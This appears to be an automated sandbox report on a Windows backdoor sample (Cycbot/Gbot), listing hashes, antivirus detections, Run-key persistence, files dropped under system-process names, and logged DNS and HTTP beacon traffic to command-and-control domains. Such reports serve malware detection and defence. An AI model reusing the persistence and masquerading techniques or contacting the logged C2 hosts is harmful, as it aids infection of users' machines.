Analysis Date: 2015-01-17 13:53:46
MD5: 817a59afd18c72c6c35c040499dff1cc
SHA1: b9b6d197d00700404b1209d5dbf305165f35c734

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 452358b409d706e69b824c8aa8b9b807 sha1: b25eace1f232db7b82c01cb36980e177565cd6d0 size: 112640
Section: .rdata md5: aead6bf6ce1c4e050e12820dc79bb7c2 sha1: acb70bb494b7948a5f0374766e748eb0e5dc3f1e size: 1024
Section: .data md5: 7a8bad8d29a702eb727bc3897c3cde88 sha1: 429e4c8f3652a4c32a1166732b9d8da85be86a5d size: 66560
Section: .reloc md5: edf6451d405777a4c1de22af61d40d04 sha1: 8bfd68b276c6aab17581fa9b526507862646e536 size: 1024
Timestamp: 2005-10-29 07:03:34
PEhash: ece4578c4d5b41039e673c8e52830e59d401730c
IMPhash: 4eb3fae2e5d5b84e8059aebd86a6504d
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Heur.Conjar.5
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-449
AV Dr. Web: BackDoor.Gbot.73
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.SXV
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: greenherbalteaonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: coolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: greenherbalteaonline.com
Type: A
209.222.14.3
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: yourmediaresources.com
Type: A
DNS: coolmediastore.com
Type: A
HTTP GET: http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup250.gif?v13=90&tq=gJ4WK%2FSUh6THhRMw9YLJqMSTUivqg4akxZNSK%2B%2FbxWq1SfkIYVBe
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap

Strings